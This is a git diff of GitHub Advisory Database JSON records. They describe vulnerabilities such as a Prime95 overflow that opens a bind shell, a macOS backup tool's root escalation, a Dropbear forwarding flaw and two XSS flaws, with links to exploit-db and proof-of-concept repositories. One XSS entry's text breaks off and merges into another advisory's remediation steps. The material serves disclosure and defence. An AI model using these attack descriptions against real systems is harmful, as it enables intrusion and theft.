"type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25336" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47719" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47759" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotauditor-base-local-buffer-overflow-seh" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wj5q-5q5g-5j5w/GHSA-wj5q-5q5g-5j5w.json b/advisories/unreviewed/2026/02/GHSA-wj5q-5q5g-5j5w/GHSA-wj5q-5q5g-5j5w.json new file mode 100644 index 0000000000000..cb4f8c6c51c2f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wj5q-5q5g-5j5w/GHSA-wj5q-5q5g-5j5w.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj5q-5q5g-5j5w", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2026-26225" + ], + "details": "Intego Personal Backup, a macOS backup utility that allows users to create scheduled backups and bootable system clones, contains a local privilege escalation vulnerability. Backup task definitions are stored in a location writable by non-privileged users while being processed with elevated privileges. By crafting a malicious serialized task file, a local attacker can trigger arbitrary file writes to sensitive system locations, leading to privilege escalation to root.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26225" + }, + { + "type": "WEB", + "url": "https://blog.quarkslab.com/intego_lpe_macos_1.html" + }, + { + "type": "WEB", + "url": "https://integosupport.zendesk.com/hc/en-us/articles/40945636077467-Personal-Backup-X9-Release-Notes" + }, + { + "type": "WEB", + "url": "https://www.intego.com" + }, + { + "type": "WEB", + "url": "https://www.intego.com/bootable-mac-backups" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/intego-personal-backup-task-file-privilege-escalation" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T22:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wj8f-mjpv-f78g/GHSA-wj8f-mjpv-f78g.json b/advisories/unreviewed/2026/02/GHSA-wj8f-mjpv-f78g/GHSA-wj8f-mjpv-f78g.json index ed8c1f219c284..5d44daf9de231 100644 --- a/advisories/unreviewed/2026/02/GHSA-wj8f-mjpv-f78g/GHSA-wj8f-mjpv-f78g.json +++ b/advisories/unreviewed/2026/02/GHSA-wj8f-mjpv-f78g/GHSA-wj8f-mjpv-f78g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wj8f-mjpv-f78g", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T00:32:51Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20634" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. Processing a maliciously crafted image may result in disclosure of process memory.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -49,7 +54,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-x252-4r5q-2hc6/GHSA-x252-4r5q-2hc6.json b/advisories/unreviewed/2026/02/GHSA-x252-4r5q-2hc6/GHSA-x252-4r5q-2hc6.json new file mode 100644 index 0000000000000..86fec0dd0d8f9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x252-4r5q-2hc6/GHSA-x252-4r5q-2hc6.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x252-4r5q-2hc6", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25327" + ], + "details": "Prime95 version 29.8 build 6 contains a buffer overflow vulnerability in the user ID input field that allows remote attackers to execute arbitrary code. Attackers can craft a malicious payload and paste it into the PrimeNet user ID and proxy host fields to trigger a bind shell on port 3110.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25327" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47802" + }, + { + "type": "WEB", + "url": "https://www.mersenne.org" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/prime-version-build-buffer-overflow-seh" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x79w-g7mm-hjhj/GHSA-x79w-g7mm-hjhj.json b/advisories/unreviewed/2026/02/GHSA-x79w-g7mm-hjhj/GHSA-x79w-g7mm-hjhj.json new file mode 100644 index 0000000000000..da9921c2e5ca4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x79w-g7mm-hjhj/GHSA-x79w-g7mm-hjhj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x79w-g7mm-hjhj", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25339" + ], + "details": "GHIA CamIP 1.2 for iOS contains a denial of service vulnerability in the password input field that allows attackers to crash the application. Attackers can paste a 33-character buffer of repeated characters into the password field to trigger an application crash on iOS devices.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25339" + }, + { + "type": "WEB", + "url": "https://apps.apple.com/mx/app/ghia-camip/id1342090963" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47721" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ghia-camip-for-ios-password-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json b/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json new file mode 100644 index 0000000000000..57ba37db12fa6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xqcm-jrw9-wq72", + "modified": "2026-02-13T00:32:51Z", + "published": "2026-02-13T00:32:51Z", + "aliases": [ + "CVE-2025-14282" + ], + "details": "A flaw was found in Dropbear. When running in multi-user mode and authenticating users, the dropbear ssh server does the socket forwardings requested by the remote client as root, only switching to the logged-in user upon spawning a shell or performing some operations like reading the user's files. With the recent ability of also using unix domain sockets as the forwarding destination any user able to log in via ssh can connect to any unix socket with the root's credentials, bypassing both file system restrictions and any SO_PEERCRED / SO_PASSCRED checks performed by the peer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14282" + }, + { + "type": "WEB", + "url": "https://github.com/mkj/dropbear/pull/391" + }, + { + "type": "WEB", + "url": "https://lists.ucc.gu.uwa.edu.au/pipermail/dropbear/2025q4/002390.html" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2025/12/16/4" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2025/12/17/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T22:16:03Z" + } +} \ No newline at end of file From 610ee7ef647288d84deb6deaf9b74c59e2aeae59 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 03:32:44 +0000 Subject: [PATCH 055/215] Publish Advisories GHSA-cvhv-6xm6-c3v4 GHSA-h573-p6v2-3p2p GHSA-mgx6-7qx4-g5f3 --- .../GHSA-cvhv-6xm6-c3v4.json | 34 ++++++++++++++++++ .../GHSA-h573-p6v2-3p2p.json | 36 +++++++++++++++++++ .../GHSA-mgx6-7qx4-g5f3.json | 36 +++++++++++++++++++ 3 files changed, 106 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h573-p6v2-3p2p/GHSA-h573-p6v2-3p2p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mgx6-7qx4-g5f3/GHSA-mgx6-7qx4-g5f3.json diff --git a/advisories/unreviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json b/advisories/unreviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json new file mode 100644 index 0000000000000..4c2a8efa272eb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvhv-6xm6-c3v4", + "modified": "2026-02-13T03:31:23Z", + "published": "2026-02-13T03:31:23Z", + "aliases": [ + "CVE-2026-1721" + ], + "details": "Summary\n\nA Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the AI Playground's OAuth callback handler. The `error_description` query parameter was directly interpolated into an HTML script tag without proper escaping, allowing attackers to execute arbitrary JavaScript in the context of the victim's session.\n\n\n\n\nRoot cause\n\nThe OAuth callback handler in `site/ai-playground/src/server.ts` directly interpolated the `authError` value, sourced from the `error_description` query parameter, into an inline ``.\n 2. Open the integrations CP view.\n 3. Script executes.\n\n**Impact**\nArbitrary JS in admin CP; session/CSRF token theft; potential full admin takeover via DOM-driven actions.\n\n**Remediation**\n- Sanitize/HTML-encode all user-controlled strings before passing to `dangerouslySetInnerHTML`, or avoid it for labels/titles/icons.\n- Server-side: strip/escape disallowed tags on save for fields, integration metadata, WYSIWYG content.\n- Add regression tests with `` payloads to ensure no execution in builder/integration views.\n\n**Workarounds**\n- Restrict form-edit permissions to trusted admins only until patched.\n- Consider CSP that disallows inline scripts (defense-in-depth only).\n\n**Credits**\n- Discovered by https://www.linkedin.com/in/praveenkavinda/ | Prav33N-Sec.", "severity": [ @@ -41,9 +43,21 @@ "type": "WEB", "url": "https://github.com/solspace/craft-freeform/security/advisories/GHSA-jp3q-wwp3-pwv9" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26188" + }, + { + "type": "WEB", + "url": "https://github.com/solspace/craft-freeform/commit/b9adad6cdf1eba5400aae8b1ae39bd7d4d33af5e" + }, { "type": "PACKAGE", "url": "https://github.com/solspace/craft-freeform" + }, + { + "type": "WEB", + "url": "https://github.com/solspace/craft-freeform/releases/tag/v5.14.7" } ], "database_specific": { @@ -53,6 +67,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2026-01-22T21:41:14Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T23:16:09Z" } } \ No newline at end of file From bc2ffab8a114dec112114cac6ae81cf3673edae1 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 15:32:20 +0000 Subject: [PATCH 061/215] Publish Advisories GHSA-mpwp-whhg-qqx4 GHSA-22m6-6xhc-4ffw GHSA-25c8-jwjc-6mjh GHSA-366r-6rjw-f277 GHSA-4m8q-p6h8-x2wj GHSA-4p49-fwp8-38mv GHSA-5m2c-5h5x-7j8g GHSA-8qwr-rrp6-9jjv GHSA-8xrx-9wj4-6775 GHSA-cqx4-h5ph-3xj9 GHSA-hpj8-5pv7-f58m GHSA-jh9m-9mr6-3ghc GHSA-jjrf-jfrm-p64x GHSA-pmfg-h9xp-96jh GHSA-q3vc-646j-prpq GHSA-r5cf-37x9-4hgv GHSA-rp46-r563-jrc7 GHSA-wp4v-6rrv-wqv9 GHSA-wxwg-9693-mqg4 GHSA-xgwv-vx48-69hc --- .../GHSA-mpwp-whhg-qqx4.json | 4 +- .../GHSA-22m6-6xhc-4ffw.json | 36 +++++++++++++ .../GHSA-25c8-jwjc-6mjh.json | 6 ++- .../GHSA-366r-6rjw-f277.json | 11 ++-- .../GHSA-4m8q-p6h8-x2wj.json | 11 ++-- .../GHSA-4p49-fwp8-38mv.json | 36 +++++++++++++ .../GHSA-5m2c-5h5x-7j8g.json | 6 ++- .../GHSA-8qwr-rrp6-9jjv.json | 6 ++- .../GHSA-8xrx-9wj4-6775.json | 11 ++-- .../GHSA-cqx4-h5ph-3xj9.json | 6 ++- .../GHSA-hpj8-5pv7-f58m.json | 11 ++-- .../GHSA-jh9m-9mr6-3ghc.json | 49 +++++++++++++++++ .../GHSA-jjrf-jfrm-p64x.json | 53 +++++++++++++++++++ .../GHSA-pmfg-h9xp-96jh.json | 3 +- .../GHSA-q3vc-646j-prpq.json | 36 +++++++++++++ .../GHSA-r5cf-37x9-4hgv.json | 11 ++-- .../GHSA-rp46-r563-jrc7.json | 6 ++- .../GHSA-wp4v-6rrv-wqv9.json | 11 ++-- .../GHSA-wxwg-9693-mqg4.json | 11 ++-- .../GHSA-xgwv-vx48-69hc.json | 36 +++++++++++++ 20 files changed, 332 insertions(+), 28 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-22m6-6xhc-4ffw/GHSA-22m6-6xhc-4ffw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4p49-fwp8-38mv/GHSA-4p49-fwp8-38mv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jh9m-9mr6-3ghc/GHSA-jh9m-9mr6-3ghc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jjrf-jfrm-p64x/GHSA-jjrf-jfrm-p64x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json diff --git a/advisories/unreviewed/2026/01/GHSA-mpwp-whhg-qqx4/GHSA-mpwp-whhg-qqx4.json b/advisories/unreviewed/2026/01/GHSA-mpwp-whhg-qqx4/GHSA-mpwp-whhg-qqx4.json index 85d3b133235be..0f75d1d732e20 100644 --- a/advisories/unreviewed/2026/01/GHSA-mpwp-whhg-qqx4/GHSA-mpwp-whhg-qqx4.json +++ b/advisories/unreviewed/2026/01/GHSA-mpwp-whhg-qqx4/GHSA-mpwp-whhg-qqx4.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-415" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-22m6-6xhc-4ffw/GHSA-22m6-6xhc-4ffw.json b/advisories/unreviewed/2026/02/GHSA-22m6-6xhc-4ffw/GHSA-22m6-6xhc-4ffw.json new file mode 100644 index 0000000000000..097b91a57a611 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-22m6-6xhc-4ffw/GHSA-22m6-6xhc-4ffw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-22m6-6xhc-4ffw", + "modified": "2026-02-13T15:30:27Z", + "published": "2026-02-13T15:30:27Z", + "aliases": [ + "CVE-2026-1578" + ], + "details": "HP App for Android is potentially vulnerable to cross-site scripting (XSS) when using an outdated version of the application via mobile devices. HP is releasing updates to mitigate these potential vulnerabilities.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1578" + }, + { + "type": "WEB", + "url": "https://support.hp.com/us-en/document/ish_14083522-14083606-16/hpsbgn04082" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T15:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-25c8-jwjc-6mjh/GHSA-25c8-jwjc-6mjh.json b/advisories/unreviewed/2026/02/GHSA-25c8-jwjc-6mjh/GHSA-25c8-jwjc-6mjh.json index df07d89ac6fc7..4220712a92a0b 100644 --- a/advisories/unreviewed/2026/02/GHSA-25c8-jwjc-6mjh/GHSA-25c8-jwjc-6mjh.json +++ b/advisories/unreviewed/2026/02/GHSA-25c8-jwjc-6mjh/GHSA-25c8-jwjc-6mjh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-25c8-jwjc-6mjh", - "modified": "2026-02-05T21:32:39Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-05T18:30:30Z", "aliases": [ "CVE-2025-68722" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68722" }, + { + "type": "WEB", + "url": "https://github.com/osmancanvural/CVE-2025-68722" + }, { "type": "WEB", "url": "https://www.axigen.com/knowledgebase/Axigen-WebAdmin-CSRF-Vulnerability-CVE-2025-68722-_407.html" diff --git a/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json b/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json index d4979bea0bd98..1ba079289f53f 100644 --- a/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json +++ b/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-366r-6rjw-f277", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20646" ], "details": "A logging issue was addressed with improved data redaction. This issue is fixed in macOS Tahoe 26.3. A malicious app may be able to read sensitive location information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:07Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json index c9a3d93f490a4..406dcef173473 100644 --- a/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json +++ b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4m8q-p6h8-x2wj", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-13T15:30:24Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20654" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to cause unexpected system termination.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -37,7 +42,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4p49-fwp8-38mv/GHSA-4p49-fwp8-38mv.json b/advisories/unreviewed/2026/02/GHSA-4p49-fwp8-38mv/GHSA-4p49-fwp8-38mv.json new file mode 100644 index 0000000000000..96a1aaa4dd87b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4p49-fwp8-38mv/GHSA-4p49-fwp8-38mv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4p49-fwp8-38mv", + "modified": "2026-02-13T15:30:26Z", + "published": "2026-02-13T15:30:26Z", + "aliases": [ + "CVE-2026-1618" + ], + "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Universal Software Inc. FlexCity/Kiosk allows Privilege Escalation.This issue affects FlexCity/Kiosk: from 1.0 before 1.0.36.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1618" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0065" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-288" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T14:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5m2c-5h5x-7j8g/GHSA-5m2c-5h5x-7j8g.json b/advisories/unreviewed/2026/02/GHSA-5m2c-5h5x-7j8g/GHSA-5m2c-5h5x-7j8g.json index b80d4bf5b5be7..aec71790559c2 100644 --- a/advisories/unreviewed/2026/02/GHSA-5m2c-5h5x-7j8g/GHSA-5m2c-5h5x-7j8g.json +++ b/advisories/unreviewed/2026/02/GHSA-5m2c-5h5x-7j8g/GHSA-5m2c-5h5x-7j8g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5m2c-5h5x-7j8g", - "modified": "2026-02-05T21:32:39Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-05T18:30:30Z", "aliases": [ "CVE-2025-68721" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68721" }, + { + "type": "WEB", + "url": "https://github.com/osmancanvural/CVE-2025-68721" + }, { "type": "WEB", "url": "https://www.axigen.com/knowledgebase/Axigen-WebAdmin-Improper-Access-Control-Vulnerability-CVE-2025-68721-_406.html" diff --git a/advisories/unreviewed/2026/02/GHSA-8qwr-rrp6-9jjv/GHSA-8qwr-rrp6-9jjv.json b/advisories/unreviewed/2026/02/GHSA-8qwr-rrp6-9jjv/GHSA-8qwr-rrp6-9jjv.json index 3cea669a88c23..daa49651bebb5 100644 --- a/advisories/unreviewed/2026/02/GHSA-8qwr-rrp6-9jjv/GHSA-8qwr-rrp6-9jjv.json +++ b/advisories/unreviewed/2026/02/GHSA-8qwr-rrp6-9jjv/GHSA-8qwr-rrp6-9jjv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8qwr-rrp6-9jjv", - "modified": "2026-02-10T15:30:21Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-05T18:30:32Z", "aliases": [ "CVE-2025-68723" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68723" }, + { + "type": "WEB", + "url": "https://github.com/osmancanvural/CVE-2025-68723" + }, { "type": "WEB", "url": "https://www.axigen.com/knowledgebase/Axigen-WebAdmin-Stored-XSS-Vulnerabilities-CVE-2025-68723-_408.html" diff --git a/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json index f074b5365ed5c..583c0515f5221 100644 --- a/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json +++ b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8xrx-9wj4-6775", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20649" ], "details": "A logging issue was addressed with improved data redaction. This issue is fixed in watchOS 26.3, iOS 26.3 and iPadOS 26.3, tvOS 26.3, macOS Tahoe 26.3. A user may be able to view sensitive user information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -33,7 +38,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:07Z" diff --git a/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json b/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json index a604220a3fc44..c7a7a06ab87da 100644 --- a/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json +++ b/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cqx4-h5ph-3xj9", - "modified": "2026-02-12T21:31:25Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-03T03:30:26Z", "aliases": [ "CVE-2025-15556" ], "details": "Notepad++ versions prior to 8.8.9, when using the WinGUp updater, contain an update integrity verification vulnerability where downloaded update metadata and installers are not cryptographically verified. An attacker able to intercept or redirect update traffic can cause the updater to download and execute an attacker-controlled installer, resulting in arbitrary code execution with the privileges of the user.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json b/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json index 2031bb8024ac1..d0aa53669911d 100644 --- a/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json +++ 